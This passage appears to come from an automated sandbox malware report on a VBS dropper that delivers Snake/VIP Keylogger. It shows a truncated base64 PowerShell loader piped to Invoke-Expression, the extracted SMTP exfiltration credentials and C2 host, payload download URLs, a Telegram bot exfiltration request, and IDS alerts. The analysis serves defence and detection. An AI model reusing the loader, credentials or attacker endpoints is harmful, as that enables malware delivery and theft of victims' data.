QBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA==')) | Invoke-Expression", CommandLine: "C

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:29.543691+010020576351A Network Trojan was detected23.186.113.60443192.168.2.749700TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:27.677768+010020490381A Network Trojan was detected193.30.119.105443192.168.2.749699TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:15.545041+010020600481Malware Command and Control Activity Detected192.168.2.749844111.90.142.170587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:34.646334+010028033053Unknown Traffic192.168.2.749719104.21.64.1443TCP
                  2025-02-18T08:22:37.734493+010028033053Unknown Traffic192.168.2.749743104.21.64.1443TCP
                  2025-02-18T08:22:40.655855+010028033053Unknown Traffic192.168.2.749766104.21.64.1443TCP
                  2025-02-18T08:22:43.871843+010028033053Unknown Traffic192.168.2.749785104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:32.380313+010028032742Potentially Bad Traffic192.168.2.749707132.226.8.16980TCP
                  2025-02-18T08:22:33.638717+010028032742Potentially Bad Traffic192.168.2.749707132.226.8.16980TCP
                  2025-02-18T08:22:35.498113+010028032742Potentially Bad Traffic192.168.2.749725132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:29.543691+010028582951A Network Trojan was detected23.186.113.60443192.168.2.749700TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:29.176255+010028410751Malware Command and Control Activity Detected192.168.2.74970023.186.113.60443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-18T08:22:46.839531+010018100071Potentially Bad Traffic192.168.2.749803149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9dAvira URL Cloud: Label: malware
                  Source: http://turkey.ipchina163.comAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}
                  Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: jjmax il.vbsVirustotal: Detection: 18%Perma Link
                  Source: jjmax il.vbsReversingLabs: Detection: 13%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Sample uses string decryption to hide its real strings
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpackString decryptor: jjmaxcolrlone@interelub.com
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpackString decryptor: !YxP!%1gFh=G
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpackString decryptor: turkey.ipchina163.com
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpackString decryptor: 587
                  Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpackString decryptor:

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49713 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49803 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02FEF45Dh11_2_02FEF2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02FEF45Dh11_2_02FEF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02FEFC19h11_2_02FEF961

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.7:49844 -> 111.90.142.170:587
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49803 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.105:443 -> 192.168.2.7:49699
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 23.186.113.60:443 -> 192.168.2.7:49700
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.186.113.60:443 -> 192.168.2.7:49700
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: paste.ee
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.7:49844 -> 111.90.142.170:587
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1Host: 3005.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/QXyRXYmm/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:088753%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:06:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20088753%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49725 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.7:49700 -> 23.186.113.60:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49785 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49766 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 104.21.64.1:443
                  Source: global trafficTCP traffic: 192.168.2.7:49844 -> 111.90.142.170:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
